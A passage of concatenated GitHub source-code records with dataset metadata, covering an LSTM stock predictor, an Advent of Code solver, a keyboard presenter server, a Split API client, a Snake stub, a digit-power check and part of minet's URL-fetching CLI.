ohlcv_histories : ',ohlcv_histories) # 시그모이드 함수로 값들을 바꾼 후에 330건씩 50일로 나눠서 3차원 배열로 만든값\n print('6. _ : ',_) # 330개를 가지고 있는 50묶음의 배열에 대한 종가의 평균 배열\n print('6. next_day_open_values : ',next_day_open_values)# 시그모이드함수로 정규화된 주식 시작가 2차원 배열 (대신에 1차원에 값이 하나씩만 들어있다)\n print('6. unscaled_y : ',unscaled_y) # 시작가만 있는 (정규화 X) 2차원 배열 (기존에 받아온 데이터에서 시작가격만 남기고 삭제)\n print('6. y_normaliser : ',y_normaliser) # MinMaxScaler()\n\n\n train_ratio = 0.7\n n = int(ohlcv_histories.shape[0] * train_ratio) # 330 * 0.7의 값을 가진다. = 230\n print('13. n : ',ohlcv_histories.shape[0])\n print('14. n : ',n)\n # print('13. ohlcv_histories.shape : ',ohlcv_histories.shape)\n\n ohlcv_train = ohlcv_histories[-n:-1] # 330 중에서 100 ~ 330이전까지 229개\n y_train = next_day_open_values[-n:-1]\n\n ohlcv_test = ohlcv_histories[:ohlcv_histories.shape[0] - n]\n y_test = next_day_open_values[:ohlcv_histories.shape[0] - n]\n\n unscaled_y_test = unscaled_y[:ohlcv_histories.shape[0] - n]\n\n print('ohlcv_train.shape: ', ohlcv_train.shape)\n print('ohlcv_test.shape: ', ohlcv_test.shape)\n\n ohlcv_train\n\n # model architecture\n # Keras의 함수형 API를 사용하여 LSTM 네트워크에 입력을 정의하는 부분입니다.\n # Input(shape=(50, 5), name='lstm_input')는 LSTM 네트워크에 들어갈 입력 데이터의 형태를 정의하는 부분입니다.\n # Input: Keras 함수형 API에서 모델의 입력을 정의하는 클래스입니다.\n # shape=(50, 5): 입력 데이터의 형태를 나타내며, (시퀀스 길이, 특성 개수)로 구성됩니다. 이 경우, 시퀀스 길이는 50이며, 각 시퀀스는 5개의 특성으로 구성되어 있음을 의미합니다.\n # name='lstm_input': 입력 레이어의 이름을 지정합니다. 이를 통해 모델을 시각화하거나 모델의 구조를 살펴볼 때 레이어를 식별할 수 있습니다.\n # 이를 통해 입력 데이터의 형태가 (None, 50, 5)인 LSTM 모델을 구성할 수 있습니다. 여기서 None은 입력 데이터의 배치 크기를 의미하며, 실제 모델을 컴파일할 때 배치 크기가 지정됩니다.\n # 입력 데이터의 형태는 (시퀀스 길이, 특성 개수)로 50개의 시퀀스 길이와 각 시퀀스에 5개의 특성으로 구성된 3D 텐서입니다.\n lstm_input = Input(shape=(history_points, 5), name='lstm_input')\n x = LSTM(50, name='lstm_0')(lstm_input) # 50개의 유닛(뉴런)을 가진 LSTM 샐을 생성, 이름은 'lstm_0'으로하고, lstm_input로 출력을 생성\n x = Dropout(0.2, name='lstm_dropout_0')(x) # 과적합을 방지하기 위한 드롭아웃 레이어 랜덤하게 일부 뉴런 비활성화 (0.2)는 20%를 뜻한다, lstm_dropout_0는 레이어 이름\n x = Dense(64, name='dense_0')(x) # 64개의 유닛을 가진 완전 연결 레이어를 생성합니다, dense_0는 레이어 이름\n x = Activation('sigmoid', name='sigmoid_0')(x) # 활성화 함수를 정의합니다. sigmoid 활성화 함수를 적용하여 출력을 생성,\n x = Dense(1, name='dense_1')(x) # 마지막 완전 연결(Dense) 레이어를 정의합니다. 이 레이어는 1개의 유닛을 가지며, 최종적인 출력을 생성한다, 입력 데이터 x에 마지막 완전 연결 레이어를 적용하여 출력을 생성한다\n # 최종 출력 레이어를 정의합니다. 활성화 함수로 linear를 사용하여 선형 함수를 적용합니다. 선형 함수는 입력과 동일한 값을 출력하는 함수이며, 회귀 문제에서 주로 사용한다. 입력 데이터 x에 최종 출력 레이어를 적용하여 최종 출력을 생성합니다.\n output = Activation('linear', name='linear_output')(x)\n # 위와 같이 정의된 모델은 LSTM 기반의 시계열 예측 모델이며, 입력으로 50개의 시퀀스 길이와 5개의 특성을 가진 데이터를 받고, 출력으로 단일 값을 예측합니다.\n\n\n\n model = Model(inputs=lstm_input, outputs=output) # 입력과 출력을 지정하여 최종 모델을 생성합니다.\n adam = optimizers.Adam(lr=0.0005) # Adam 옵티마이저를 생성합니다. 학습률(learning rate)은 0.0005로 설정되어 있습니다.\n model.compile(optimizer=adam, loss='mse') # 모델을 컴파일합니다. 손실 함수로는 평균 제곱 오차(Mean Squared Error, MSE)를 사용하고, Adam 옵티마이저를 지정합니다\n # 모델을 학습합니다. 
입력 데이터로 ohlcv_train, 출력 데이터로 y_train을 사용하며, 한 번의 배치 크기는 32입니다.\n # 총 50 에포크(epoch) 동안 학습하며, 데이터를 무작위로 섞어가며 학습합니다.\n # 학습 데이터의 10%를 검증 데이터로 사용하도록 지정되어 있습니다.\n model.fit(x=ohlcv_train, y=y_train, batch_size=32, epochs=50, shuffle=True, validation_split=0.1)\n # evaluation\n\n y_test_predicted = model.predict(ohlcv_test) # 학습된 모델을 사용하여 ohlcv_test 데이터를 예측합니다.\n y_test_predicted = y_normaliser.inverse_transform(y_test_predicted) # 정규화된 예측값을 다시 역정규화하여 원래의 주가 단위로 변환합니다.\n y_predicted = model.predict(ohlcv_histories) # 학습된 모델을 사용하여 ohlcv_histories 데이터를 예측합니다.\n y_predicted = y_normaliser.inverse_transform(y_predicted) # 정규화된 예측값을 다시 역정규화하여 원래의 주가 단위로 변환합니다.\n\n assert unscaled_y_test.shape == y_test_predicted.shape # assert는 해당값의 true라는 것을 보장\n print('15. y_test_predicted : ',y_test_predicted)\n print('16. unscaled_y_test : ',unscaled_y_test)\n\n real_mse = np.mean(np.square(unscaled_y_test - y_test_predicted)) #공통된 값을 빼고, 값 값을 제곱한 다음에 배열의 평균을 구한다.\n scaled_mse = real_mse / (np.max(unscaled_y_test) - np.min(unscaled_y_test)) * 100\n print(scaled_mse)\n\n from datetime import datetime\n model.save(f'basic_model.h5')\n\n import matplotlib.pyplot as plt\n\n plt.gcf().set_size_inches(22, 15, forward=True)\n\n start = 0\n end = -1\n\n # real = plt.plot(unscaled_y_test[start:end], label='real')\n # pred = plt.plot(y_test_predicted[start:end], label='predicted')\n\n real = plt.plot(unscaled_y[start:end], label='real')\n pred = plt.plot(y_predicted[start:end], label='predicted')\n\n plt.legend(['Real', 'Predicted'])\n plt.title('SK Hynix Using LSTM by TGG')\n plt.show()\n\n col_name = ['real', 'pred']\n real, pred = pd.DataFrame(unscaled_y[start:end]), pd.DataFrame(y_predicted[start:end])\n foo = pd.concat([real, pred], axis=1)\n foo.columns = col_name\n\n foo\n\n foo.corr()\n\n foo['real+1'] = foo['real'].shift(periods=1)\n foo[['real+1', 'pred']].corr()\n\n\nmain()\n\n\n\n\n","repo_name":"zigoom/BLUE_OCEAN","sub_path":"workspace/python/Server_Test/test_function/lstm_test_orignal.py","file_name":"lstm_test_orignal.py","file_ext":"py","file_size_in_byte":16878,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"261058338","text":"import math\nfrom collections import namedtuple, defaultdict\nfrom heapq import heappush, heappop\nfrom typing import Generator, Tuple, List, Set\n\n_INPUT_FILE = 'input.txt'\n\n\nPoint = namedtuple('Point', ['x', 'y'])\n\n\ndef read_input(input_file: str) -> Generator[Point, None, None]:\n with open(file=input_file, mode='r') as f:\n for i, line in enumerate(f.readlines()):\n for j,col in enumerate(list(line)):\n if col == '#':\n yield Point(j, i)\n\n\ndef distance(a: Point, b: Point) -> float:\n \"\"\"Compute distance between two points\"\"\"\n return math.sqrt(math.pow(b.x - a.x, 2) + math.pow(b.y - a.y, 2))\n\n\ndef angle(a: Point, b: Point) -> int:\n \"\"\"Compute angle between ortogonal and difference vectors\"\"\"\n ang = math.degrees(math.atan2(b.y - a.y, b.x - a.x)) + 90\n return ang + 360 if ang < 0 else ang\n\n\ndef compute_visibility_angles(asteroid: Point, asteroid_list: List[Point]) -> Set[int]:\n return {angle(asteroid, ast) for ast in asteroid_list}\n\n\ndef group_asteroids_by_angle(space_station, asteroid_list):\n angle_dict = defaultdict(list)\n for ast in asteroids:\n # Each dict entry holds a heap ordered by distance to asteroid\n heappush(angle_dict[angle(space_station, ast)], (distance(space_station, ast), ast))\n return angle_dict\n\n\ndef eliminate_asteroids(angle_dict):\n eliminated = 0\n 
last_eliminated = None\n while True:\n for ang in sorted(angle_dict.keys()):\n if angle_dict[ang]:\n last_eliminated = heappop(angle_dict[ang])\n eliminated += 1\n print(f\"Vaporizing asteroid #{eliminated} at {last_eliminated}\")\n if eliminated == 200:\n return last_eliminated[1]\n\n\nif __name__ == '__main__':\n asteroids = list(read_input(input_file=_INPUT_FILE))\n angle_dict = group_asteroids_by_angle(Point(13, 17), asteroids)\n asteroid_200_pos = eliminate_asteroids(angle_dict)\n print(f\"Answer: {asteroid_200_pos[0] * 100 + asteroid_200_pos[1]}\")\n\n","repo_name":"JMLizano/AOC2019","sub_path":"day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37892092507","text":"import socket\nimport sys\nfrom pynput.keyboard import Key, Controller\nimport time\n\nTCP_IP = sys.argv[1]\nTCP_PORT = 5005\nBUFFER_SIZE = 20 # Normally 1024, but we want fast response\n\nkeyboard = Controller()\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(1)\n\nprint(\"Server: \", TCP_IP)\n\nwhile 1:\n\ttry:\n\t\tprint(\"Waiting...\")\n\n\t\tconn, addr = s.accept()\n\t\tprint('Connection address: ', addr)\n \n\t\tdata = conn.recv(BUFFER_SIZE)\n\t\tif not data: break\n\t\tprint(\"received data:\", data,)\n\t\t\n\t\tif data == b'forward':\n\t\t\tkeyboard.press(Key.right)\n\t\t\tkeyboard.release(Key.right)\n\t\telif data == b'backward':\n\t\t\tkeyboard.press(Key.left)\n\t\t\tkeyboard.release(Key.left)\n\texcept KeyboardInterrupt:\n\t\tif conn:\n\t\t\tconn.close()\n\t\tprint(\"W: interrupt received, stopping…\")\n\t\tbreak\n\tfinally:\n\t\t# clean up\n\t\tconn.close()\n#conn.close()","repo_name":"eliahvo/presenter-app","sub_path":"presenterServer.py","file_name":"presenterServer.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31833330100","text":"import time\n\nfrom time_profiler import timer\nfrom memory_profiler import profile\n\nfrom api import function\nfrom api import saxParser\nimport tkinter as tk\nfrom time import sleep\nfrom GUI import move\nfrom GUI import zoom\nfrom GUI import gui\nimport asyncio\n\nMAX = 5.0\nCOUNT_TIME = 0\nDELETE_ON_OFF = True\nSLEEP_COUNT = 0.0\nDELAY_SLEEP=0.0\ndef create_node(board, handler):\n \"\"\"\n Function for draw nodes to board\n :param board: Tkinter board\n :param handler: Sax parser handler with data\n \"\"\"\n global COUNT_TIME\n COUNT_TIME = 0\n for i in handler.node:\n # +MAX for biggest size\n coord = float(i[2]), float(i[3]), float(i[2])+MAX, float(i[3])+MAX\n\n y = list(coord)\n for c in range(len(y)):\n y[c] = y[c]*MAX\n coord = tuple(y)\n\n id_node = board.create_oval(coord, fill=\"blue\")\n\n #/2 for input ID to node\n id_text = board.create_text(float((coord[0]+coord[2])/2.0), float((coord[1]+coord[3])/2.0), text=handler.nodeDesc[str(i[0])], fill=\"white\")\n function.node_id.update({i[0] : [id_node, id_text]})\n\n # move board\n board.bind(\"\", lambda event: move.move_start(event, board))\n board.bind(\"\", lambda event: move.move_move(event, board))\n\n board.bind(\"\", lambda event: move.pressed2(event, board))\n board.update()\n\n\ndef create_transport_line(board, handler, iteration):\n \"\"\"\n Function for draw line between 2 nodes\n :param board: Tkinter board\n :param handler: Sax parser handler with data\n \"\"\"\n\n for t in handler.transport[iteration:]:\n if not 
function.simulationOnOff:\n break\n\n\n helper_update(handler)\n\n global DELETE_ON_OFF\n DELETE_ON_OFF = True\n call_async(board)\n gui_update(handler=handler)\n\n function.count_iteration = function.count_iteration + 1\n #check change position\n if function.count_iteration in handler.nodeChangePos:\n new_node_create(board, handler, function.count_iteration)\n\n if not check_transport(handler=handler,iteration=function.count_iteration-1,iterationNext=function.count_iteration):\n first, last = t[0], t[1]\n coordFirst = handler.node[int(first)].copy()\n color = 'green'\n if last == \"-\":\n\n coordLast = handler.node[int(first)].copy()\n coordLast[3] = coordLast[3] + 5\n color = 'red'\n\n else:\n coordLast = handler.node[int(last)].copy()\n\n\n #### append id of line which send data\n new_line_id = board.create_line((coordFirst[2] + 2.5) * MAX, (coordFirst[3] + 2.5) * MAX,\n (coordLast[2] + 2.5) * MAX, (coordLast[3] + 2.5) * MAX, arrow=tk.LAST,\n width=3, fill=color)\n\n function.line_id_array.append(new_line_id)\n\n else:\n if len(function.help_time_line_array)>1:\n function.help_time_line_array.pop(len(function.help_time_line_array)-2)\n\n try:\n if (float(function.help_time_line_array[-1])) - (time.time() - function.t1_start - SLEEP_COUNT)>0:\n\n sleep(float(function.help_time_line_array[-1]) - (time.time() - function.t1_start - SLEEP_COUNT))\n except:\n None\n\n\n if function.count_iteration%150==0:\n board.update()\n\n t1_stop = time.time()\n\n\n #print(\"Elapsed time during the whole program in seconds:\",\n # t1_stop - function.t1_start)\n board.update()\n\n\nasync def call(board):\n await asyncio.gather(time_line_delete(), delete_line(board))\ndef call_async(board):\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(call(board))\nasync def time_line_delete():\n global COUNT_TIME\n global DELETE_ON_OFF\n global SLEEP_COUNT\n if len(function.time_line_array) > 1:\n sleep_time = float(function.time_line_array[COUNT_TIME+1]) - float(function.time_line_array[COUNT_TIME])\n\n if sleep_time > 0:\n SLEEP_COUNT += function.speed\n await asyncio.sleep(sleep_time+function.speed)\n else:\n await asyncio.sleep(0)\n COUNT_TIME = COUNT_TIME + 1\n DELETE_ON_OFF = False\n\nasync def delete_line(board):\n\n while DELETE_ON_OFF:\n\n try:\n while ((time.time() - function.t1_start - SLEEP_COUNT) - (float(function.help_time_line_array[0]))) >= 0.5:\n\n function.help_time_line_array.pop(0)\n board.delete(function.line_id_array[0])\n function.line_id_array.pop(0)\n board.update()\n\n except:\n None\n await asyncio.sleep(0)\n\n\n\n\n\ndef create_step_line(board, handler, iteration, step):\n delete_all(board)\n\n check = False\n color = 'green'\n trans = []\n if step==\"f\":\n trans = handler.transport[iteration]\n function.count_iteration = function.count_iteration + 1\n\n\n if step==\"b\":\n trans = handler.transport[iteration - 2]\n function.count_iteration = function.count_iteration - 1\n\n\n first, last = trans[0], trans[1]\n coordFirst = handler.node[int(first)].copy()\n\n if last == \"-\":\n coordLast = handler.node[int(first)].copy()\n coordLast[3] = coordLast[3] + 5\n color = 'red'\n\n else:\n coordLast = handler.node[int(last)].copy()\n\n gui_update(handler=handler)\n\n # check change position\n if function.count_iteration in handler.nodeChangePos:\n new_node_create(board, handler, function.count_iteration)\n\n if function.line_id != \"null\":\n board.delete(function.line_id)\n\n function.line_id = board.create_line((coordFirst[2] + 2.5) * MAX, (coordFirst[3] + 2.5) * MAX,\n 
(coordLast[2] + 2.5) * MAX, (coordLast[3] + 2.5) * MAX, arrow=tk.LAST, width=3,\n fill=color)\n\n board.update()\n\n\n\n\n\n\ndef check_transport(handler, iteration, iterationNext):\n try:\n\n trans = handler.transport[iteration].copy()\n transNext = handler.transport[iterationNext].copy()\n\n if trans == transNext:\n\n return True\n else:\n return False\n except:\n return False\n\n\ndef new_node_create(board, handler, iteration):\n for x in handler.nodePos:\n if x[3]==iteration:\n #delete node\n deleteNode= function.node_id.get(x[0])\n board.delete(deleteNode[0])\n board.delete(deleteNode[1])\n\n #create new node\n\n handler.node[x[0]][2] = x[1]\n handler.node[x[0]][3] = x[2]\n node = handler.node[x[0]]\n coord = float(node[2]), float(node[3]), float(node[2]) + MAX, float(node[3]) + MAX\n\n y = list(coord)\n for c in range(len(y)):\n y[c] = y[c] * MAX\n coord = tuple(y)\n\n id_node = board.create_oval(coord, fill=\"blue\")\n # /2 for input ID to node\n id_text = board.create_text(float((coord[0] + coord[2]) / 2.0), float((coord[1] + coord[3]) / 2.0),\n text=handler.nodeDesc[str(x[0])], fill=\"white\")\n function.node_id.update({x[0]: [id_node, id_text]})\n\n\n\ndef gui_update(handler):\n gui.stepLabel.config(text=\"Steps: \" + str(function.count_iteration+1) + \"/\" + str(function.max_iteration))\n gui.textLabel.delete('1.0', tk.END)\n gui.textLabel.insert(tk.END, handler.metaInfo[function.count_iteration])\n gui.timeLabel.config(text=\"Time: \" + handler.transportTime[function.count_iteration] + \" s\")\n\ndef helper_update(handler):\n function.time_line_array.append(handler.transportTime[function.count_iteration])\n function.help_time_line_array.append(handler.transportTime[function.count_iteration])\n\n\ndef delete_all(board):\n for x in function.line_id_array:\n board.delete(x)\n function.time_line_array = []\n","repo_name":"pribula329/DP_NS3_Pribula","sub_path":"api/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37458596139","text":"'''\nCreated on Dec 30 2013\n@author: Kelly Chan\n\nPython Version: V2.7.3\n\nCourse: Python Data Mining\nLesson: User Recommendation\nMethods: Minkowski Distance (Euclidean)\n\n'''\n\ndef minkowski(rating1, rating2, r):\n \"\"\"Computes the Minkowski distance.\n Both rating1 and rating2 are dictionaries of the form\n {'The Strokes': 3.0, 'Slightly Stoopid': 2.5}\"\"\"\n distance = 0\n commonRatings = False\n for key in rating1:\n if key in rating2:\n distance += pow(abs(rating1[key] - rating2[key]), r)\n commonRatings = True\n if commonRatings:\n return pow(distance, 1.0/r)\n else:\n return -1 #Indicates no ratings in common","repo_name":"neoconstantine7/Python","sub_path":"examples/RecommendationSystem/minkowski.py","file_name":"minkowski.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26011801570","text":"from sqlalchemy.orm import Session\nfrom attendance import models, schemas\nfrom fastapi import HTTPException\n\n#utility\ndef get_base_salarys(db:Session, user_id: int, current: models.User):\n if not current.hr:\n raise HTTPException(status_code=401, detail=\"You are not hr.\")\n db_salary = db.query(models.BaseSalary).filter(models.BaseSalary.user_id==user_id).all()\n return db_salary\n\n#hr\ndef create_base_salary(db:Session, base_salary: schemas.BaseSalaryCreate, current: models.User):\n if 
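In the minkowski helper above, r selects the metric: r=1 is Manhattan distance, r=2 Euclidean. A quick worked check on two illustrative rating dicts (values assumed), relying on float division 1.0/r since the file targets Python 2:

a = {'Blues Traveler': 3.5, 'Norah Jones': 4.5}
b = {'Blues Traveler': 2.0, 'Norah Jones': 4.0}
# r=1 (Manhattan): |3.5-2.0| + |4.5-4.0| = 2.0
# r=2 (Euclidean): (1.5**2 + 0.5**2) ** 0.5 ~= 1.581
print(minkowski(a, b, 1), minkowski(a, b, 2))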
base_salary.salary <= 0:\n raise HTTPException(status_code=400, detail=\"Wrong salary.\")\n if base_salary.self_percent > 6 or base_salary.self_percent < 0:\n raise HTTPException(status_code=400, detail=\"Wrong self percent.\")\n if not current.hr:\n raise HTTPException(status_code=401, detail=\"You are not hr.\")\n user = db.query(models.User).filter(models.User.id==base_salary.user_id, models.User.status==0).first()\n if not user:\n raise HTTPException(status_code=404, detail=\"User not found or resigned.\")\n db_salary = models.BaseSalary(salary=base_salary.salary, user_id= base_salary.user_id, date= base_salary.date,\n self_percent= base_salary.self_percent)\n db.add(db_salary)\n db.commit()\n db.refresh(db_salary)\n return get_base_salarys(db, user_id=base_salary.user_id, current=current)","repo_name":"auyu0408/attendance_backend","sub_path":"attendance/crud/base_salary.py","file_name":"base_salary.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20101088864","text":"from urllib.parse import urlencode\n\nfrom splitcli.split_apis import http_client\n\n# URLs\n\ndef users_url():\n return f\"users\"\n\ndef user_url(user_id):\n base_url = users_url()\n return f\"{base_url}/{user_id}\"\n\ndef invite_user(email, group_ids):\n groups = list(map(lambda x: {\"id\":x, \"type\":\"group\"}, group_ids))\n content = {\n \"email\": email,\n \"groups\":groups\n }\n http_client.post(users_url(), content)\n\ndef list_users(status=None,group_id=None):\n all_users = []\n next_marker = None\n # Stop once the server returns no next marker\n while True:\n result = list_users_batch(next_marker, status, group_id)\n next_marker = result['nextMarker']\n data = result['data']\n if len(data) != 0:\n all_users.extend(data)\n if next_marker is None:\n break\n return all_users\n\ndef list_users_batch(next=None, status=None, group_id=None):\n path = users_url()\n query = {}\n if next is not None:\n query[\"after\"] = next\n if status is not None:\n query[\"status\"] = status\n if group_id is not None:\n query[\"group_id\"] = group_id\n if query:\n path += f\"?{urlencode(query)}\"\n return http_client.get(path)\n\ndef get_user_by_email(email):\n users = list_users(status=\"ACTIVE\")\n match = list(filter(lambda x: x['email'] == email, users))\n if len(match) == 1:\n return match[0]\n else:\n return None\n\ndef get_user(user_id):\n path = user_url(user_id)\n return http_client.get(path)","repo_name":"splitio-examples/splitcli","sub_path":"splitcli/split_apis/users_api.py","file_name":"users_api.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"72"} +{"seq_id":"1947707075","text":"import pygame\r\n\r\npygame.init()\r\n\r\nrow = 10\r\ncol = 10\r\n\r\nclass Node():\r\n def __init__(self, posx: int, posy: int, next):\r\n self.posx = posx\r\n self.posy = posy\r\n self.next = next\r\n\r\nclass Board():\r\n def __init__(self):\r\n self.board = [[0] * col for _ in range(row)]\r\n self.board[row//2][col//2] = 1\r\n\r\nclass Move():\r\n def __init__(self, vx: int, vy: int):\r\n self.vx = vx\r\n self.vy = vy\r\n\r\nUP = Move(0,-1)\r\nDOWN = Move(0,1)\r\nRIGHT = Move(1,0)\r\nLEFT = Move(-1,0)\r\n\r\nclass Snake():\r\n def __init__(self, first: Node):\r\n self.first = first\r\n\r\n def move(self, direction: Move, growing: bool):\r\n first = self.first\r\n if direction != None:\r\n posx = direction.vx + first.posx\r\n posy = direction.vy + 
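users_api.py's list_users/list_users_batch pair is a standard cursor (marker) pagination loop: pass the last marker back in as ?after=..., stop when the server returns no marker. The same pattern reduced to a generic sketch, where fetch_page is a hypothetical stand-in for list_users_batch:

def paginate(fetch_page):
    # fetch_page(cursor) -> {'data': [...], 'nextMarker': str or None}
    items, cursor = [], None
    while True:
        page = fetch_page(cursor)
        items.extend(page['data'])
        cursor = page['nextMarker']
        if cursor is None:  # the server signals the last page with a null marker
            break
    return items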
first.posy\r\n node = Node(posx,posy,first)\r\n self.first = node\r\n if not growing:\r\n while(node.next.next != None):\r\n node = node.next\r\n node.next = None\r\n","repo_name":"PaccoTan/SimpleSnake","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7776721880","text":"def f2(m):\n s=0\n f=m\n for k in range(5):\n x=m%10\n s=s+x**4\n m=m//10\n if s==f:\n return True\n else:\n return False\ni=int(input())\nprint(f2(i))","repo_name":"Hyper-Han/Learn-Python","sub_path":"综合/27四叶玫瑰数.py","file_name":"27四叶玫瑰数.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41058572116","text":"# =============================================================================\n# Minet Fetch CLI Action\n# =============================================================================\n#\n# Action reading an input CSV file line by line and fetching the urls found\n# in the given column. This is done in a respectful multithreaded fashion to\n# optimize both running time & memory.\n#\nimport os\nimport csv\nimport sys\nimport gzip\nfrom io import StringIO\nfrom os.path import join, dirname, isfile\nfrom collections import Counter\nfrom tqdm import tqdm\nfrom uuid import uuid4\nfrom ural import is_url\n\nfrom minet.contiguous_range_set import ContiguousRangeSet\n\nfrom minet.fetch import multithreaded_fetch\nfrom minet.utils import (\n grab_cookies,\n parse_http_header,\n PseudoFStringFormatter\n)\nfrom minet.cli.reporters import report_error\nfrom minet.cli.utils import (\n custom_reader,\n open_output_file,\n die,\n LazyLineDict\n)\n\nOUTPUT_ADDITIONAL_HEADERS = [\n 'line',\n 'resolved',\n 'status',\n 'error',\n 'filename',\n 'encoding'\n]\n\nCUSTOM_FORMATTER = PseudoFStringFormatter()\n\n\ndef fetch_action(namespace):\n\n # Are we resuming\n resuming = namespace.resume\n\n if resuming and not namespace.output:\n die([\n 'Cannot --resume without specifying -o/--output.'\n ])\n\n # Do we need to fetch only a single url?\n if namespace.file is sys.stdin and is_url(namespace.column):\n namespace.file = StringIO('url\\n%s' % namespace.column)\n namespace.column = 'url'\n\n # If we are hitting a single url we enable contents_in_report\n if namespace.contents_in_report is None:\n namespace.contents_in_report = True\n\n input_headers, pos, reader = custom_reader(namespace.file, namespace.column)\n filename_pos = input_headers.index(namespace.filename) if namespace.filename else None\n indexed_input_headers = {h: p for p, h in enumerate(input_headers)}\n\n selected_fields = namespace.select.split(',') if namespace.select else None\n selected_pos = [input_headers.index(h) for h in selected_fields] if selected_fields else None\n\n # HTTP method\n http_method = namespace.method\n\n # Cookie grabber\n get_cookie = None\n if namespace.grab_cookies:\n get_cookie = grab_cookies(namespace.grab_cookies)\n\n # Global headers\n global_headers = None\n if namespace.headers:\n global_headers = {}\n\n for header in namespace.headers:\n k, v = parse_http_header(header)\n global_headers = v\n\n # Reading output\n output_headers = (list(input_headers) if not selected_pos else [input_headers[i] for i in selected_pos])\n output_headers += OUTPUT_ADDITIONAL_HEADERS\n\n if namespace.contents_in_report:\n output_headers.append('raw_content')\n\n flag = 'w'\n\n if namespace.output is not None and 
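The f2 routine above tests whether a number equals the sum of the fourth powers of its digits, i.e. a four-digit narcissistic number ("four-leaf rose number"). A compact cross-check enumerating them all:

# Expected output: [1634, 8208, 9474]
print([n for n in range(1000, 10000)
       if n == sum(int(d) ** 4 for d in str(n))])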
resuming and isfile(namespace.output):\n flag = 'r+'\n\n output_file = open_output_file(namespace.output, flag=flag)\n\n output_writer = csv.writer(output_file)\n\n if not resuming:\n output_writer.writerow(output_headers)\n else:\n\n # Reading report to know what need to be done\n _, rpos, resuming_reader = custom_reader(output_file, 'line')\n\n resuming_reader_loading = tqdm(\n resuming_reader,\n desc='Resuming',\n dynamic_ncols=True,\n unit=' lines'\n )\n\n already_done = ContiguousRangeSet()\n\n for line in resuming_reader_loading:\n index = line[rpos]\n\n already_done.add(int(index))\n\n # Loading bar\n total = namespace.total\n\n if total is not None and resuming:\n total -= len(already_done)\n\n loading_bar = tqdm(\n desc='Fetching pages',\n total=total,\n dynamic_ncols=True,\n unit=' urls'\n )\n\n def url_key(item):\n line = item[1]\n url = line[pos].strip()\n\n if not url:\n return\n\n # Url templating\n if namespace.url_template:\n return namespace.url_template.format(value=url)\n\n return url\n\n def request_args(url, item):\n cookie = None\n\n # Cookie\n if get_cookie:\n cookie = get_cookie(url)\n\n # Headers\n headers = None\n\n if global_headers:\n headers = global_headers\n\n return {\n 'method': http_method,\n 'cookie': cookie,\n 'headers': headers\n }\n\n def write_output(index, line, resolved=None, status=None, error=None,\n filename=None, encoding=None, data=None):\n\n if selected_pos:\n line = [line[p] for p in selected_pos]\n\n line.extend([\n index,\n resolved or '',\n status or '',\n error or '',\n filename or '',\n encoding or ''\n ])\n\n if namespace.contents_in_report:\n line.append(data or '')\n\n output_writer.writerow(line)\n\n errors = 0\n status_codes = Counter()\n\n target_iterator = enumerate(reader)\n\n if resuming:\n target_iterator = (pair for pair in target_iterator if not already_done.stateful_contains(pair[0]))\n\n multithreaded_iterator = multithreaded_fetch(\n target_iterator,\n key=url_key,\n request_args=request_args,\n threads=namespace.threads,\n throttle=namespace.throttle\n )\n\n for result in multithreaded_iterator:\n line_index, line = result.item\n\n if not result.url:\n\n write_output(\n line_index,\n line\n )\n\n loading_bar.update()\n continue\n\n response = result.response\n data = response.data if response is not None else None\n\n content_write_flag = 'wb'\n\n # Updating stats\n if result.error is not None:\n errors += 1\n else:\n if response.status >= 400:\n status_codes[response.status] += 1\n\n postfix = {'errors': errors}\n\n for code, count in status_codes.most_common(1):\n postfix[str(code)] = count\n\n loading_bar.set_postfix(**postfix)\n loading_bar.update()\n\n # No error\n if result.error is None:\n\n filename = None\n\n # Building filename\n if data:\n if filename_pos is not None or namespace.filename_template:\n if namespace.filename_template:\n filename = CUSTOM_FORMATTER.format(\n namespace.filename_template,\n value=line[filename_pos] if filename_pos is not None else None,\n ext=result.meta['ext'],\n line=LazyLineDict(indexed_input_headers, line)\n )\n else:\n filename = line[filename_pos] + result.meta['ext']\n else:\n # NOTE: it would be nice to have an id that can be sorted by time\n filename = str(uuid4()) + result.meta['ext']\n\n # Standardize encoding?\n encoding = result.meta['encoding']\n\n if data and namespace.standardize_encoding or namespace.contents_in_report:\n if encoding is None or encoding != 'utf-8' or namespace.contents_in_report:\n data = data.decode(encoding if encoding is not None else 'utf-8', 
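The filename templating in this fetch action goes through minet's PseudoFStringFormatter; the underlying stdlib mechanism is string.Formatter. A sketch of a tolerant variant in that spirit (the class name and missing-field behavior are assumptions here, not minet's actual implementation):

from string import Formatter

class LenientFormatter(Formatter):
    # Render missing template fields as '' instead of raising.
    def get_value(self, key, args, kwargs):
        try:
            return super().get_value(key, args, kwargs)
        except (KeyError, IndexError):
            return ''

f = LenientFormatter()
print(f.format('{value}{ext}', value='page', ext='.html'))  # page.html
print(f.format('{value}{missing}', value='page'))           # page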
